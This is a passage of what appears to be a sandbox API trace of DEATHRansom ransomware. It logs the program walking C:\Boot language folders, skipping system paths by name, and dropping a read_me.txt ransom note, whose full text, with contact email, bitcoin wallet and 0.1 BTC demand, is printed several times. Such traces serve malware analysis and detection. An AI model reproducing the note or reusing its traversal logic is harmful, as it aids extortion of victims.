pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0075.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.017] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.017] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0075.018] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.018] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.018] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\read_me.txt") returned 29 [0075.018] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\read_me.txt" (normalized: "c:\\boot\\it-it\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.018] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.018] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.019] CloseHandle (hObject=0x7a8) returned 1 [0075.019] GetProcessHeap () returned 0x4f10000 [0075.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.019] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0075.019] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0075.019] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0075.019] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="programdata") returned 0x0 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="$recycle.bin") returned 0x0 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="program files") returned 0x0 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="windows") returned 0x0 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="all users") returned 0x0 [0075.019] StrStrW (lpFirst="ja-jp", lpSrch="appdata") returned 0x0 [0075.019] GetProcessHeap () returned 0x4f10000 [0075.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.019] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0075.019] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 13 [0075.020] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.020] GetProcessHeap () returned 0x4f10000 [0075.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.021] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0075.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.021] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0075.021] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.021] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.021] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.021] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0075.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.021] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.021] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0075.021] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.021] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.021] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt") returned 29 [0075.021] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt" (normalized: "c:\\boot\\ja-jp\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.021] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.021] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.022] CloseHandle (hObject=0x7a8) returned 1 [0075.022] GetProcessHeap () returned 0x4f10000 [0075.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.022] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0075.022] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0075.022] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0075.022] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0075.022] StrStrW (lpFirst="ko-kr", lpSrch="programdata") returned 0x0 [0075.023] StrStrW (lpFirst="ko-kr", lpSrch="$recycle.bin") returned 0x0 [0075.023] StrStrW (lpFirst="ko-kr", lpSrch="program files") returned 0x0 [0075.023] StrStrW (lpFirst="ko-kr", lpSrch="windows") returned 0x0 [0075.023] StrStrW (lpFirst="ko-kr", lpSrch="all users") returned 0x0 [0075.023] StrStrW (lpFirst="ko-kr", lpSrch="appdata") returned 0x0 [0075.023] GetProcessHeap () returned 0x4f10000 [0075.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.023] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0075.023] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 14 [0075.023] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.024] GetProcessHeap () returned 0x4f10000 [0075.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.024] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0075.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.024] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0075.024] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.024] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.024] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0075.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.024] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.024] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0075.024] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.024] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.024] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt") returned 29 [0075.024] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt" (normalized: "c:\\boot\\ko-kr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.025] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.025] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.026] CloseHandle (hObject=0x7a8) returned 1 [0075.026] GetProcessHeap () returned 0x4f10000 [0075.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.026] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0075.026] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0075.026] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0075.026] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0075.026] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0075.026] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="programdata") returned 0x0 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="$recycle.bin") returned 0x0 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="program files") returned 0x0 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="windows") returned 0x0 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="all users") returned 0x0 [0075.026] StrStrW (lpFirst="nb-no", lpSrch="appdata") returned 0x0 [0075.026] GetProcessHeap () returned 0x4f10000 [0075.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.026] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0075.026] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 15 [0075.027] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.027] GetProcessHeap () returned 0x4f10000 [0075.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.028] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0075.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.028] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0075.028] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.028] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.028] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.028] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0075.028] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.028] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.028] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0075.028] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: 